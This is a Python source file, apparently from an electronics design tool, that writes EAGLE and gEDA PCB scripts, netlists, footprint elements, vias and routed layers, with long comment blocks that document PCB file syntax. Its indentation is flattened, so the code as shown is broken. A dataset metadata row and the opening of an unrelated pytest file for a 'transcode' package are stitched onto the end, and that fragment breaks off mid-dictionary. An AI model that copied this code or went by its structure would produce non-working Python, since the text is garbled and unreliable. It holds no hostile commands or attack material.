## self.brd.addLayer(CLayer("signal3",7))
## self.brd.addLayer(CLayer("signal4",8))
## self.brd.addLayer(CLayer("Vias",9))
## self.brd.addLayer(CLayer("silk",10))
pass
#Layer(1 "solder")
#(
# Line(1375 1075 1325 1025 40 30 0x00000020)
#)
# gen sch layers scr"
def genSchLayersScr(self):
ns = ''
CRLF = "\n"
ns = pcb_layers;
return ns;
#ADD 'C1' 'G$1' POLARISED_CASE_H@ipc-7351-capacitor R0.000 (-0.300 3.300);
#ADD 'Q1' 'G$1' -PNP-SOT23-EBC@transistor R0.000 (1.600 3.300);
#ADD 'Q5' 'G$1' MMBT2222ALT1-NPN-SOT23-BEC@transistor R0.000 (0.900 2.800);
#ADD 'V1' 'GND' GND@supply2 R0.000 (0.600 0.100);
#ADD 'V2' 'G$1' VCC@supply2 R0.000 (5.600 4.200);
# gen sch add scr"
def genSchAddScr(self):
ns = ''
CRLF = "\n"
ns += "GRID INCH 0.005" + CRLF
ns += "Layer (91 Nets;" + CRLF
ns += "Layer (92 Busses;" + CRLF
ns += "Layer (93 Pins;" + CRLF
ns += "Layer (94 Symbols;" + CRLF
ns += "Layer (95 Names;" + CRLF
ns += "Layer (96 Values;" + CRLF
ns += "Layer (250 Descript;" + CRLF
ns += "Layer (251 SMDround;" + CRLF
ns += "DISPLAY -PINS" + CRLF
ns += CRLF
ns += "EDIT .S1" + CRLF
ns += "SET WIRE_BEND 2;" + CRLF
ns += "CHANGE STYLE 'Continuous'" + CRLF
for dev in self.sch.devices:
ns += "ADD '" + str(dev.refid) + "' 'G$1' " + str(dev.name) + "@" + str(dev.libname) + " " + dev.orientation + "R%.3f"% (dev.rotation) +" (" + str(dev.position) + ");" + CRLF
ns += "GRID LAST" + CRLF
return ns
# gen cmd sch net-connect"
def genSchNetConnectScr(self):
ns = ''
CRLF = "\n"
runcmd="run " + self.script_path + "/sch-net-connect.ulp"
		for net in self.sch.nets.values():
prevdev=""
prevpin=""
l = ""
first = 1
for node in net.nodes:
if first:
first = 0
prevdev=str(node.dev.refid)
prevpin=str(node.pin)
else:
l = runcmd + " " + net.name + " " + prevdev + " " + prevpin + " " + str(node.dev.refid) + " " + str(node.pin) + ";" + CRLF
ns += l
prevdev=str(node.dev.refid)
prevpin=str(node.pin)
# string function
return ns
# gen sch netlist listing
def genSchNetlistLst(self):
ns = ''
CRLF = '\n'
for net in self.sch.nets.values():
name = net.name
ns += net.name + ' '
for node in net.nodes:
ns += str(node.dev.refid) + '-' + str(node.pin.num) + ' '
ns += CRLF
ns += CRLF #extra one
# string function
return ns
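	# For example, a net "GND" with nodes (U1, pin 1) and (C3, pin 2) yields the
	# line:  GND U1-1 C3-2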
# gen sch netlist script
def genSchNetlistScr(self):
ns = ''
CRLF = "\n"
ns = "# Netlist script" + CRLF
ns += "# EAGLE Version 4.11" + CRLF
ns += "# Copyright Hobby-Robotics" + CRLF
ns += expandtab("#Net\tPart\tPad",12) + CRLF
ns += CRLF
for net in self.sch.nets.values():
ns += CRLF
ns += "Change Class 0;" + CRLF
l = "Signal " + " '" + net.name + "'"
first = 1
for node in net.nodes:
if first:
first = 0
l += "\t'"
else:
l += "\t\t"
l += str(node.dev.refid) + "'\t'" + str(node.pin) + "' \\" + CRLF
ns += expandtab(str(l),12)
ns += "\t\t\t;" + CRLF
# string function
return ns
# Select
# {"All objects" Select(ObjectByName) ActiveWhen(have_regex)}
# {"Elements" Select(ElementByName) ActiveWhen(have_regex)}
# {"Pads" Select(PadByName) ActiveWhen(have_regex)}
# {"Pins" Select(PinByName) ActiveWhen(have_regex)}
# {"Text" Select(TextByName) ActiveWhen(have_regex)}
# {"Vias" Select(ViaByName) ActiveWhen(have_regex)}
# Move
# {"Move selected elements to other side" Flip(SelectedElements) a={"Shift-B" "Shift<Key>b"}}
# {"Remove selected objects" RemoveSelected()}
# {Connects m=C
# {"Lookup connection to object" GetXY(Select the object) Connection(Find) a={"Ctrl-F" "Ctrl<Key>f"}}
# {"Reset scanned pads/pins/vias" Connection(ResetPinsViasAndPads) Display(Redraw)}
# {"Reset scanned lines/polygons" Connection(ResetLinesAndPolygons) Display(Redraw)}
# {"Reset all connections" Connection(Reset) Display(Redraw) a={"Shift-F" "Shift<Key>f"}}
# {"Optimize rats nest" Atomic(Save) DeleteRats(AllRats)
# Atomic(Restore) AddRats(AllRats) Atomic(Block) a={"O" "<Key>o"}}
# {"Erase rats nest" DeleteRats(AllRats) a={"E" "<Key>e"}}
# {"Erase selected rats" DeleteRats(SelectedRats) a={"Shift-E" "Shift<Key>e"}}
#
# {"Auto-route selected rats" AutoRoute(Selected)}
# {"Auto-route all rats" AutoRoute(AllRats)}
# {"Rip up all auto-routed tracks" RipUp(All)}
# {"Optimize routed tracks"
# {"Auto-Optimize" djopt(auto) a={"Shift-=" "Shift<Key>="}}
# {"Debumpify" djopt(debumpify) }
# {"Unjaggy" djopt(unjaggy) }
# {"Vianudge" djopt(vianudge) }
# {"Viatrim" djopt(viatrim) }
# {"Ortho pull" djopt(orthopull) }
# {"Simple optimization" djopt(simple) a={"=" "<Key>="}}
# {"Miter" djopt(miter) }
# {"Puller" a={"Y" "<Key>y"} Puller() }
#
# {"Only autorouted nets" OptAutoOnly() checked=optautoonly}
# }
# {"Design Rule Checker" DRC()}
# {"Apply vendor drill mapping" ApplyVendor()}
# }
def genBrdPlaceBottom(self):
ns = ''
#Select(ElementByName|ObjectByName|PadByName|PinByName)
for dev in self.brd.devices.values():
name = str(dev.refid)
if dev.bottom:
#Select(ElementByName) ActiveWhen(have_regex)
ns += 'Select(ElementByName) ActiveWhen( ' + name + ' )\n'
ns += 'Flip(SelectedElements)\n'
ns += 'Unselect(All)\n'
return ns
# gen brd cmd scr"
def genBrdCmdScr(self):
ns = ''
CRLF = "\n"
ns += "# Gen EDA generated" + CRLF
ns += "# date:" + CRLF # version
ns += "# user:" + CRLF # version
# LoadFrom(Layout|LayoutToBuffer|ElementToBuffer|Netlist|Revert,filename)
ns += 'LoadFrom( Layout, ' + self.script_path + '/' + self.brd.name + '.pcb )' + CRLF # layout
ns += 'LoadFrom( Netlist, ' + self.script_path + '/' + self.brd.name + '.net )' + CRLF # netlist
# Do not do that, do it in the placement
# ns += self.genBrdPlaceBottom()
# AddRats(AllRats|SelectedRats|Close)
ns += 'AddRats(AllRats)' + CRLF # add all rats
# AutoRoute(AllRats|SelectedRats)
ns += 'AutoRoute(AllRats)' + CRLF # route all rats
# Auto-Optimize djopt(auto)
ns += 'djopt(auto)' + CRLF # optimize all routes
# SaveTo(Layout|LayoutAs,filename)
ns += 'SaveTo( LayoutAs, ' + self.script_path + '/' + self.brd.name + '.brd )' + CRLF # board
ns += 'Quit( )' + CRLF # Quit
return ns
#####################################
## release: pcb 1.7.1.ALPHA
## date: Sun Jul 22 15:22:22 2001
## user: tp (Terry Porter,,,)
## host: gronk.porter.net
#PCB("" 6047 4000)
#
#Grid(25 0 0 0)
#Cursor(400 0 2)
#Flags(0x000000c0)
#Groups("1,s:2,c:3:4:5:6:7:8")
#Styles("Signal,10,40,20:Power,25,60,35:Fat,40,60,35:Skinny,8,36,20")
####################################
# release: pcb 1.99v
# date: Tue May 1 07:59:48 2007
# user: pawel (pawel,U-WODNICKI\pawel,S-1-5-21-1835012242-1811546175-1750076985-1007)
# host: Wodnicki
#
#FileVersion[20070407]
#
#PCB["" 350000 330000]
#
#Grid[3937.007904 1800 100 1]
#Cursor[133000 107500 2.000000]
#PolyArea[200000000.000000]
#Thermal[0.500000]
#DRC[1000 1000 1000 1000 1500 1000]
#Flags("rubberband,nameonpcb,alldirection,uniquename,snappin")
#Groups("4,5,6,c:1,2,3,s:8:7")
#Styles["Signal,1000,4000,2000,1000:Power,2500,6000,3500,1000:Fat,4000,6000,3500,1000:Skinny,800,3600,2000,1000"]
# gen brd board scr"
def genBrdBoardScr(self):
ns = ''
CRLF = "\n"
ns += "# boostEDA generated" + CRLF
ns += "# date:" + CRLF # version
ns += "# user:" + CRLF # version
# determine board size, aka outline for rectangular ones only
self.brd.outline.calcBBox()
xsize = self.brd.outline.bbox.sizeX()
ysize = self.brd.outline.bbox.sizeY()
ns += "PCB[\"" + self.brd.name + "\" "
ns += "%d "% (xsize) # x size
ns += " %d"% (ysize) # y size
ns += "]" + CRLF
ns += "Grid(25 0 0 0)" + CRLF
ns += "Cursor(400 0 2)" + CRLF
ns += "Flags(0x000000c0)" + CRLF
ns += "Groups(\"1,s:2,c:3:4:5:6:7:8\")" + CRLF
ns += "Styles(\"Signal,10,40,20:Power,25,60,35:Fat,40,60,35:Skinny,8,36,20\")" + CRLF
return ns
#Layer(1 "solder")
#(
# Line(1375 1075 1325 1025 40 30 0x00000020)
#)
def genBrdLayerFromNet(self,layer,net):
ns = ''
# Should come from board technology
### print "out net " + net.name
### print "layer num " + str(layer.num)
for line in net.route:
#print "found line on net layer num " + str(line.layernum)
if line.layernum == layer.num:
### print "out line on net " + net.name
### print "net.route length " + str(len(net.route))
### print "line.points length " + str(len(line.points))
Thickness = line.thickness
Clearance = line.thickness * 2
first = True
prev = Point()
for pt in line.points:
#print "pt " + str(pt)
if first:
first = False
else:
X1 = int(prev._x)
Y1 = int(prev._y)
X2 = int(pt._x)
Y2 = int(pt._y)
ns += 'Line [' + " %d "% X1 + " %d "% Y1 + " %d "% X2 + " %d "% Y2
ns += " %d "% Thickness
ns += " %d "% Clearance
ns += '"auto"'
ns += ']\n'
prev = pt
return ns
def genLayerBlockages(self,layer):
ns = ''
# blockages use absolute coordinates,
for rect in layer.blockages:
# order of processing is important
X1=int(rect.ll._x)
Y1=int(rect.ll._y)
X2=int(rect.ur._x)
Y2=int(rect.ur._y)
ns += ' Polygon("clearpoly")\n'
ns += '(\n'
ns += " [%d "% X1 + " %d ]"% Y1
ns += " [%d "% X1 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y1
ns += '\n'
ns += ')\n'
return ns;
# routing
# gen brd layers scr"
def genBrdLayersScr(self):
### print "PCB! gen brd layers scr"
ns = ''
CRLF = "\n"
for l in self.brd.layers:
### print "layer " + l.name
ns += "Layer (" +str(l.num) + " \"" + l.name + "\")" + CRLF
ns += "(" + CRLF
# here go all of the layer elements
for net in self.brd.nets.values():
ns += self.genBrdLayerFromNet(l,net) # Routes
ns += self.generateNetPour(l,net) # Geometry
ns += self.genLayerBlockages(l)
ns += ")" + CRLF
return ns;
def generateRoutes(self):
return self.genBrdLayersScr()
def generateNetPour(self,layer,net):
ns = ''
CRLF = "\n"
### print " layer " + str(layer)
for geom in net.geometry:
### print " found geom in " + net.name + " type " + str(type(geom)) + " layer " + str(geom.layernum) + CRLF
if geom.layernum != layer.num :
continue
# Handle rectangle
#if type(geom) is Rectangle :
if isinstance(geom, Rectangle) :
### print " found Rectangle" + CRLF
rect = Rectangle(geom.ll._x, geom.ll._y, geom.ur._x, geom.ur._y, geom.layernum )
rect.normalize() # normalize just in case
# order of processing is important
X1=int(rect.ll._x)
Y1=int(rect.ll._y)
X2=int(rect.ur._x)
Y2=int(rect.ur._y)
ns += ' Polygon("clearpoly")\n'
ns += '(\n'
ns += " [%d "% X1 + " %d ]"% Y1
ns += " [%d "% X1 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y2
ns += " [%d "% X2 + " %d ]"% Y1
ns += '\n'
ns += ')\n'
return ns;
# Geometry on nets, aka pour
def generatePour(self):
ns = ''
CRLF = "\n"
for l in self.brd.layers:
### print "layer " + l.name
ns += "Layer (" +str(l.num) + " \"" + l.name + "\")" + CRLF
ns += "(" + CRLF
# here go through the layers
for net in self.brd.nets.values():
ns += self.generateNetPour(l,net)
ns += ")" + CRLF
return ns;
# Via[]
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via [X Y Thickness Clearance Mask Drill "Name" SFlags]
# Via (X Y Thickness Clearance Mask Drill "Name" NFlags)
# Via (X Y Thickness Clearance Drill "Name" NFlags)
# Via (X Y Thickness Drill "Name" NFlags)
# Via (X Y Thickness "Name" NFlags)
# X Y coordinates of center
# Thickness outer diameter of copper annulus
# Clearance add to thickness to get clearance diameter
# Mask diameter of solder mask opening
# Drill diameter of drill
# Name string, name of via (vias have names?)
# SFlags symbolic or numerical flags
# NFlags numerical flags only
def generateVias(self):
ns = ''
CRLF = "\n"
### print " board vias " + str(len(self.brd.vias))
for via in self.brd.vias:
### print "via " + via.name
ns += "Via ["
ns += " %d "% int(via.pos._x) + " %d "% int(via.pos._y)
ns += ' 4000 2000 0 2000 "" "" '
ns += "]" + CRLF
return ns;
#NetList()
#(
# Net("unnamed_net1" "(unknown)")
# (
# Connect("L1-2")
# Connect("L2-1")
# Connect("C2-1")
# Connect("C1-1")
# )
#)
# gen brd net scr"
def genBrdNetlistScr(self):
ns = ''
CRLF = "\n"
ns = 'NetList()' + CRLF
ns += '(' + CRLF
for net in self.sch.nets.values():
name = net.name
ns += "Net(\"" + net.name + "\" \"(unknown)\")" + CRLF
ns += "(" + CRLF
for node in net.nodes:
ns += expandtab("\tConnect(\"") + str(node.dev.refid) + "-" + str(node.pin.num) + "\")" + CRLF
ns += ")" + CRLF
ns += ')' + CRLF
return ns
# pcb footprint file may contain any of the following commands:
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags]
# Pad [x1 y1 x2 y2 thickness clearance mask name pad_number flags]
# Pin [x y thickness clearance mask drillholedia name number flags]
# ElementArc [x y r1 r2 startangle sweepangle thickness]
# ElementLine [x1 y1 x2 y2 thickness] -> thickness is 1000 (= 10 mils) for almost all footprints
# Comment lines start with the #-sign
#Elements
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags] item allowed value explanation comment
# element_flags unsigned hex value
# description string text description of footprint written by footprint author
# pcb name string refdes used on this particular pcb xxx
# value string value of component on this particular pcb layout xxx
# mark_x 1/100th mils
# mark_y 1/100th mils
# text_x 1/100th mils
# text_y 1/100th mils
# text direction decimal integer 0=horiz; 1=ccw90; 2=180; 3=cw90
# text_scale decimal integer usu. set 100
# text_flags unsigned hex
# Pads
# Pad[x1 y1 x2 y2 thickness clearance mask name pad_number flags] Item Allowed Value Explanation Comment
# x1 1/100th mils x(1st point)
# y1 1/100th mils y(1st point)
# x2 1/100th mils x(2nd point)
# y2 1/100th mils y(2nd point)
# thickness 1/100 mils width of metal surrounding line segment see Brorson .pdf
# clearance 1/100 mils distance to any other copper on any layer actually 1/2 of this number is used!
# mask 1/100th mils width of mask relief actual width of the mask centered on pad copper
# name string name of pad (arb. string) e.g. pad_1 or positive or any other string
# pad_number string pad # used for nets. it MUST be consistent with the definitions on the netlist.
# flags hex value xxx
# Pin[x y thickness clearance mask drillholedia name number flags] Item Allowed Value Explanation Comment
# x 1/100th mils pin x coord.
# y 1/100th mils pin y coord.
# thickness 1/100th mils copper diameter
# clearance 1/100th mils 2*(cu to cu clearance) if you want a 10 mil clearance, put 2000 (20 mils) here
# mask 1/100th mils diameter of mask aperture actual dia. of hole in mask
# drillholedia 1/100th mils dia. of hole
# name string arb. pin name
# number decimal integer pin number used by nets/rats
# flags hex xxx
# Via[]
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via [X Y Thickness Clearance Mask Drill "Name" SFlags]
# Via (X Y Thickness Clearance Mask Drill "Name" NFlags)
# Via (X Y Thickness Clearance Drill "Name" NFlags)
# Via (X Y Thickness Drill "Name" NFlags)
# Via (X Y Thickness "Name" NFlags)
# X Y coordinates of center
# Thickness outer diameter of copper annulus
# Clearance add to thickness to get clearance diameter
# Mask diameter of solder mask opening
# Drill diameter of drill
# Name string, name of via (vias have names?)
# SFlags symbolic or numerical flags
# NFlags numerical flags only
# On the Layer
# Line[]
# Line[137500 107500 132500 102500 4000 3000 "clearline"]
# Text[423000 391500 2 100 "T J PORTER ELECTRONICS" "auto"]
# Polygon("clearpoly")
# (
# [2000 198000] [47000 198000] [47000 187000] [126000 187000] [126000 198000]
# [297000 198000] [297000 1000] [2000 1000]
# )
# Notes:
# Pins - Throughole
# Pads - SMD
# Examples for version 1.99
# TH
# Element["" "Cap" "C17" "" 215500 81500 -9000 -32900 0 150 ""]
# (
# Pin[0 0 8000 3000 11000 3500 "1" "1" ""]
# Pin[0 -20000 8000 3000 11000 3500 "2" "2" ""]
# ElementLine [-5000 5000 5000 5000 1000]
# ElementLine [5000 5000 5000 -25000 1000]
# ElementLine [5000 -25000 -5000 -25000 1000]
# ElementLine [-5000 -25000 -5000 5000 1000]
#
# )
# SMD
# Element["" "SMD 0805" "C13" "" 252500 151000 -3000 4500 0 150 ""]
# (
# Pad[0 0 0 0 6000 3000 9000 "1" "1" "square"]
# Pad[0 -9000 0 -9000 6000 3000 9000 "2" "2" "square"]
# ElementLine [-3500 -12500 -3500 3500 1000]
# ElementLine [3500 -12500 -3500 -12500 1000]
# ElementLine [3500 3500 3500 -12500 1000]
# ElementLine [-3500 3500 3500 3500 1000]
# )
#
# Original
#Element["" "SOT-23 package" "Q7" "" 66666 66666 3200 5900 0 100 ""]
#(
# Pad[0 -300 0 300 3400 3000 4000 "1" "1" "square,edge2"]
# Pad[7800 -300 7800 300 3400 3000 4000 "2" "2" "square,edge2"]
# Pad[3900 -8500 3900 -7900 3400 3000 4000 "3" "3" "square"]
# ElementLine [10300 -11000 -2500 -11000 1000]
# ElementLine [10300 2900 10300 -11000 1000]
# ElementLine [-2500 2900 10300 2900 1000]
# ElementLine [-2500 -11000 -2500 2900 1000]
#)
# Placed on the far side -> layer onsolder?
#Element["selected,onsolder" "SOT-23 package" "Q7" "" 66666 133334 3200 -5900 0 100 "selected,auto"]
#(
# Pad[0 300 0 -300 3400 3000 4000 "1" "1" "selected,onsolder,square"]
# Pad[7800 300 7800 -300 3400 3000 4000 "2" "2" "selected,onsolder,square"]
# Pad[3900 8500 3900 7900 3400 3000 4000 "3" "3" "selected,onsolder,square,edge2"]
# ElementLine [10300 11000 -2500 11000 1000]
# ElementLine [10300 -2900 10300 11000 1000]
# ElementLine [-2500 -2900 10300 -2900 1000]
# ElementLine [-2500 11000 -2500 -2900 1000]
#
# )
# VIAs
# Via[17000 182000 31000 3000 34000 2800 "" ""]
# Via[17000 17000 31000 3000 34000 2800 "" ""]
# Via[282000 17000 31000 3000 34000 2800 "" ""]
# Via[282000 182000 31000 3000 34000 2800 "" ""]
# Via[15500 382500 31000 3000 34000 2800 "" ""]
# Via[15500 217500 31000 3000 34000 2800 "" ""]
# Via[280500 217500 31000 3000 34000 2800 "" ""]
# Tracks are made of Line????
# Layer(1 "solder")
# (
# Line[137500 107500 132500 102500 4000 3000 "clearline"]
# Line[145000 107500 137500 107500 4000 3000 "clearline"]
# Line[85000 112500 85000 107500 4000 3000 "clearline"]
# Line[97500 90000 97500 147500 4000 3000 "clearline"]
#)
# Element [element_flags, description, pcb-name, value, mark_x, mark_y, text_x, text_y, text_direction, text_scale, text_flags]
	def gen0805_resistor(self,refid,x,y,v):
CRLF = '\n'
s = 'Element["" "0805 chip resitor" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -700 0 700 4500 3000 5100 "1" "1" "square"]' + CRLF
s += ' Pad[8000 -700 8000 700 4500 3000 5100 "2" "2" "square"]' + CRLF
s += ' ElementLine [11700 -4400 -3700 -4400 800]' + CRLF
s += ' ElementLine [11700 4400 11700 -4400 800]' + CRLF
s += ' ElementLine [-3700 4400 11700 4400 800]' + CRLF
s += ' ElementLine [-3700 -4400 -3700 4400 800]' + CRLF
s += ')' + CRLF
return s
def gen0805_capacitor(self,refid,x,y,v):
CRLF = '\n'
s = 'Element["" "0805 chip cap" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -700 0 700 4500 3000 5100 "1" "1" "square"]' + CRLF
s += ' Pad[8000 -700 8000 700 4500 3000 5100 "2" "2" "square"]' + CRLF
s += ' ElementLine [11700 -4400 -3700 -4400 800]' + CRLF
s += ' ElementLine [11700 4400 11700 -4400 800]' + CRLF
s += ' ElementLine [-3700 4400 11700 4400 800]' + CRLF
s += ' ElementLine [-3700 -4400 -3700 4400 800]' + CRLF
s += ')' + CRLF
return s
def genSOT23(self, refid, x, y, v):
CRLF = '\n'
s = 'Element["" "SOT-23 package" "' + str(refid) + '" "' + str(v) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
s += '(' + CRLF
s += ' Pad[0 -300 0 300 3400 3000 4000 "1" "1" "square,edge2"]' + CRLF
s += ' Pad[7800 -300 7800 300 3400 3000 4000 "2" "2" "square,edge2"]' + CRLF
s += ' Pad[3900 -8500 3900 -7900 3400 3000 4000 "3" "3" "square"] ' + CRLF
s += ' ElementLine [10300 -11000 -2500 -11000 1000]' + CRLF
s += ' ElementLine [10300 2900 10300 -11000 1000]' + CRLF
s += ' ElementLine [-2500 2900 10300 2900 1000]' + CRLF
s += ' ElementLine [-2500 -11000 -2500 2900 1000]' + CRLF
s += ')' + CRLF
return s
def rotatePoint(self,pt,x0,y0,angle):
dX = pt._x - x0
dY = pt._y - y0
rX = pt._x
rY = pt._y
if angle == 90:
rX = x0 + dY
rY = y0 - dX
if angle == 180:
rX = x0 - dX
rY = y0 - dY
if angle == 270:
rX = x0 - dY
rY = y0 + dX
return rX,rY
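	# Worked example (by substitution): a 90 degree rotation here maps offsets
	# (dX, dY) to (dY, -dX) about (x0, y0), so
	#   rotatePoint(Point(10, 0), 0, 0, 90)  ->  (0, -10)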
def genElementLine(self,line,dev):
# order of processing is important
X1=int(line.points[0]._x)
Y1=int(line.points[0]._y)
X2=int(line.points[1]._x)
Y2=int(line.points[1]._y)
if dev.bottom:
Y1 = 0 - Y1
Y2 = 0 - Y2
X1,Y1 = self.rotatePoint(Point(X1,Y1),0,0,dev.rotation)
X2,Y2 = self.rotatePoint(Point(X2,Y2),0,0,dev.rotation)
		# normalize horizontal/vertical lines so that Point2 > Point1
if (X1 == X2):
if (Y1 > Y2):
t = Y1
Y1 = Y2
Y2 = t
else:
if (Y1 == Y2):
if (X1 > X2):
t = X1
X1 = X2
X2 = t
ns = 'ElementLine [' + " %d "% X1 + " %d "% Y1 + " %d "% X2 + " %d "% Y2
ns += " %d "% line.thickness
ns += ']\n'
return ns
# rotation is clockwise
def genElementArc(self,arc,dev):
# Thickness, Clearance, Mask, Drill, Name, Number, SFlags
rX = int(arc._x)
rY = int(arc._y)
# rY is
if dev.bottom:
rY = 0 - rY
if dev.rotation == 90:
arc.sangle += 90
if dev.rotation == 180:
arc.sangle += 180
if dev.rotation == 270:
arc.sangle += 270
rX,rY = self.rotatePoint(arc,0,0,dev.rotation)
arc.sangle = arc.sangle % 360
ns = 'ElementArc [' + " %d "% rX + " %d "% rY
ns += " %d "% arc.width
ns += " %d "% arc.height
ns += " %d "% arc.sangle
ns += " %d "% arc.dangle
ns += " %d "% arc.thickness
ns += ']\n'
return ns
def genElementPin(self,pin,dev):
# Thickness, Clearance, Mask, Drill, Name, Number, SFlags
rX=int(pin.pos._x)
rY=int(pin.pos._y)
		# Why don't we have to do this for the pins?
# rY is
#if dev.bottom:
# rY = 0 - rY
# Package has not been rotated and must match device pins
rX,rY = self.rotatePoint(Point(rX,rY),0,0,dev.rotation)
ns = 'Pin [' + " %d "% rX + " %d "% rY
ns += " %d "% pin.thickness
ns += " %d "% pin.clearance
ns += " %d "% pin.mask
ns += " %d "% pin.drill
ns += pin.name + ' '
ns += '"' + "%d"% pin.num + '" '
ns += pin.sflags
ns += ']\n'
return ns
def genElementPad(self,pin,dev):
# Thickness, Clearance, Mask, Name, Number, SFlags
# if package was parsed then these are set, if not I need to generate correct ones
rX1=int(pin.rX1)
rY1=int(pin.rY1)
rX2=int(pin.rX2)
rY2=int(pin.rY2)
		# Why don't we have to do this for the pads?
#if dev.bottom:
# rY1 = 0 - rY1
# rY2 = 0 - rY2
rX1,rY1 = self.rotatePoint(Point(rX1,rY1),0,0,dev.rotation)
rX2,rY2 = self.rotatePoint(Point(rX2,rY2),0,0,dev.rotation)
try:
sflags = pin.sflags
		except AttributeError:
# no PCB sflags then generate one
# square
# edge2
if pin.pad.type == "S":
sflags ='"square"'
else:
sflags ='""'
ns = 'Pad [' + " %d "% rX1 + " %d "% rY1 + " %d "% rX2 + " %d "% rY2
ns += " %d "% pin.thickness
ns += " %d "% pin.clearance
ns += " %d "% pin.mask
ns += pin.name + ' '
ns += '"' + "%d"% pin.num + '" '
ns += sflags
ns += ']\n'
return ns
def genElementBody(self,dev):
# print'name ' + dev.name
l = len(dev.pins)
# print ' len ' + str(l)
# print 'roation ' + str(dev.rotation)
ns = '(\n'
for num in range(1,l+1):
# print 'pin ' + str(num)
pin = dev.pins[num]
ppin = dev.package.pins[num]
#if dev.package.smt: # event smt packages can have pins aka mounting holes
if ppin.smt:
ns += self.genElementPad(ppin,dev)
else:
ns += self.genElementPin(ppin,dev)
for geo in dev.package.geometry:
if isinstance(geo, Line):
ns += self.genElementLine(geo,dev)
if isinstance(geo, Arc):
ns += self.genElementArc(geo,dev)
if isinstance(geo, Text):
ns += self.genElementText(geo,dev)
ns += ')\n'
return ns
# Device is on the bottom, coordinates of the pad are for the bottom
# Pcb defines package looking from top so mirror it in X back to top
# and add the flags
# For details see the core.py
def genBrdPlaceDevOnSolder(self,dev):
for pad in dev.package.pins.values():
pad.pos._y = 0 - pad.pos._y
try: # quick fix TBI
pad.rY1 = 0 - pad.rY1
			except AttributeError:
pad.rY1 = 0
try: # quick fix TBI
pad.rY2 = 0 - pad.rY2
			except AttributeError:
pad.rY2 = 0
try: # quick fix TBI
newsflags = pad.sflags.strip('"')
			except AttributeError:
newsflags = 'square' # default to square
if newsflags != '':
newsflags = ',' + newsflags
newsflags = '"onsolder' + newsflags + '"'
pad.sflags = newsflags
for pad in dev.package.geometry:
pass
# print pad.sflags
# gen brd place scr"
def genBrdPlaceScr(self):
ns = ''
CRLF = '\n'
devnum = 0
self.brd.outline.calcBBox()
for dev in self.brd.devices.values():
name = str(dev.refid) + CRLF
if dev.bottom:
self.genBrdPlaceDevOnSolder(dev)
#x = (self.brd.outline.bbox.ur._x - dev.position._x) # position is in mils
x = dev.position._x # position is in mils
#y = (self.brd.outline.bbox.ur._y - dev.position._y) # position is in mils
y = dev.position._y # position is in mils
placement = '"onsolder"'
else:
x = dev.position._x # position is in mils
y = dev.position._y # position is in mils
placement = '""'
# place the device
ns += 'Element[' + placement + ' "' + str(dev.package.description) + '" "' + str(dev.refid) + '" "' + str(dev.val) + '" ' +'%i'% x + ' ' + '%i'% y + ' 3200 5900 0 100 ""]' + CRLF
ns += self.genElementBody(dev)
# if name[0:1] == 'R':
	#		ns += self.gen0805_resistor(dev.refid,x,y,dev.val)
# if name[0:1] == 'C':
# ns += self.gen0805_capacitor(dev.refid,x,y,dev.val)
# if name[0:1] == 'Q':
# ns += self.genSOT23(dev.refid,x,y,dev.val)
# numpins = 0
# for pin in dev.pins:
# numpins += 1
# for k in dev.pins.keys():
# pin = dev.pins[k]
# dev.rotation ?
return ns
def Cmd(self,cmds):
gen = 0
sch = 0
brd = 0
cmd = 0
add = 0
layers = 0
net_connect = 0
netlist = 0
board = 0
place = 0
route = 0
scr = 0
lst = 0
# 0
if cmds[0:1] == ['gen']:
gen = 1
# 1
if cmds[1:2] == ['sch']:
sch = 1
if cmds[1:2] == ['brd']:
brd = 1
# 2
if cmds[2:3] == ['cmd']:
cmd = 1
if cmds[2:3] == ['add']:
add = 1
if cmds[2:3] == ['layers']:
layers = 1
if cmds[2:3] == ['netconnect']:
net_connect = 1
if cmds[2:3] == ['netlist']:
netlist = 1
if cmds[2:3] == ['board']:
board = 1
if cmds[2:3] == ['place']:
place = 1
if cmds[2:3] == ['route']:
route = 1
# 3
if cmds[3:4] == ['scr']:
scr = 1
if cmds[3:4] == ['lst']:
lst = 1
if gen:
if sch:
if add:
if scr:
s = self.genSchAddScr()
return s
if layers:
if scr:
s = self.genSchLayersScr()
return s
if net_connect:
pass
if netlist:
s = self.genSchNetlistLst()
return s
if brd:
if cmd:
if scr:
s = self.genBrdCmdScr() # commands to make the board
return s
if board:
if scr:
s = self.genBrdBoardScr()
return s
if layers:
if scr:
s = self.genBrdLayersScr()
return s
if place:
if scr:
s = self.genBrdPlaceScr()
return s
if netlist:
if scr:
s = self.genBrdNetlistScr()
return s
if route:
pass
return ""
def test(self):
ic1 = CDev("U1","","IC1")
ic1.add( CPin("GND",1) )
ic1.add( CPin("VCC",2) )
self.sch.addDev(ic1)
net1 = CNet("GND")
net1.add(CNode(ic1,"GND"))
self.sch.addNet(net1)
net2 = CNet("VCC")
net2.add(CNode(ic1,"VCC"))
self.sch.addNet(net2)
print "gen sch add scr"
s = self.genSchAddScr()
print s
print "gen sch net-connect scr"
s = self.genSchNetConnectScr()
print s
print "gen sch netlist lst"
s = self.genSchNetlistLst()
print s
print "gen sch netlist scr"
s = self.genSchNetlistScr()
print s
# Some tests
if __name__ == "__main__":
import sys
#import string
import re
schem = CSchematic()
board = CBoard(schem)
board.addFromSchematic()
mucs = CPCB(schem,board)
# open input file
if sys.argv[1:] == ['test']:
mucs.test()
| bsd-3-clause | 2,569,505,188,356,980,700 | 23.228858 | 181 | 0.616108 | false | 2.445766 | false | false | false |
OpenTherapeutics/transcode | tests/test_config.py | 1 | 1153 | import pytest
import transcode.conf
import transcode.render
def my_callback(source, *args, **kws):
pass
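
# Config fixtures: CFG_GOOD maps the TEXT format to a real callable,
# CFG_BAD maps MARK to a value that is not callable at all.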
CFG_GOOD = {
